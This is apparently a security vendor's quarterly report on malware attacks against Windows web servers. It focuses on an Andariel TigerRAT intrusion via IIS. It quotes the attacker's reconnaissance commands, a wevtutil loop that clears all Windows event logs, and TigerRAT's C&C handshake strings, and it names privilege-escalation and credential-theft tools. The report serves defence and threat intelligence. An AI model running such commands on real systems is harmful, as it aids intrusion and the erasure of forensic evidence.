Statistics Report on Malware Targeting Windows Web Servers in Q4 2025
AhnLab SEcurity intelligence Center (ASEC) is using the AhnLab Smart Defense (ASD) infrastructure to respond to and categorize attacks targeting poorly managed Windows web servers. This post will cover the damage status of Windows web servers that have become attack targets and the statistics of attacks that occurred against these servers in the fourth quarter of 2025. Additionally, it will categorize the malware strains used in each attack and provide detailed statistics.
1. Attack Status on Windows Web Servers
The following are statistics on attacks targeting Windows web servers in the 4th quarter of 2025 as identified through AhnLab Smart Defense (ASD) logs.
Aside from web shells, the most commonly used malware in attacks are privilege escalation tools like Potato and proxy malware. Threat actors use these tools to gain control over the infected system. Excluding these tools, the majority of malware are coin miners that install XMRig.
2. Attacks in the Fourth Quarter of 2025
Attacks against Windows web servers have been ongoing, and in the fourth quarter of 2025, there was a case of Andariel group’s TigerRAT attack. TigerRAT has been used as a backdoor by Andariel threat actors to control infected systems. However, there have been few cases of TigerRAT being used in attacks since 2024. The recent attack in October 2025 is a rare case of TigerRAT being used. The threat actor attacked the IIS web server to execute malicious commands. The initial access method is unknown, but given that the threat actor’s commands were executed by the IIS server (w3wp.exe process), it is likely that a web shell was installed to control the infected system. The threat actor used the following commands to collect information.
> query
> whoami
> qwinsta
> netstat -naop tcp
> tasklist
> systeminfo
> ipconfig /all
> query user
> appcmd list apppool
Figure 1. The command executed by the threat actor on the IIS web server
Afterward, the threat actor exploited PowerShell to download additional payloads from external sources. The downloaded files include various tools such as TigerRAT, ProcDump, PetitPotato, and PrintSpoofer.
TigerRAT is a type of backdoor that can receive and execute commands from the C&C server. In addition to executing commands, it also supports functions such as keylogging, Socks tunneling, and screen capture. The version of TigerRAT used in this attack is the same type as the previous cases.
Figure 2. Class name of TigerRAT
One of the characteristics of TigerRAT is that an authentication process is taken before the response string from the C&C server is sent, which involves sending a specific string and then checking the response string. The authentication string used in this process is also the same as before.
- Requested string: “HTTP 1.1 /index.php?member=sbi2009 SSL3.3.7
- Response string: “HTTP 1.1 200 OK SSL2.
Figure 3. Packet of communication with the C&C server
The threat actor used TigerRAT to query events for the remote desktop service and then deleted the Windows event logs.
> wevtutil qe Microsoft-Windows-TerminalServices-LocalSessionManager/Operational /c:10 “/q:*[System [(EventID=25)]]” /rd:true /f:text
> wevtutil.exe cl “Application
> for /f “tokens=*” %G in (‘wevtutil.exe el’) do (wevtutil.exe cl “%G”)
In the case of web servers, even if it is possible to execute commands from threat actors, they are run with low privileges by default, limiting the threat actor’s ability to execute malicious commands. As a result, threat actors often use the PrintSpoofer and Potato malware which exploit the tokens of the accounts of the currently running processes to escalate privileges. The threat actor used PrintSpoofer and PetitPotato, and applied ProdDump to steal credentials.
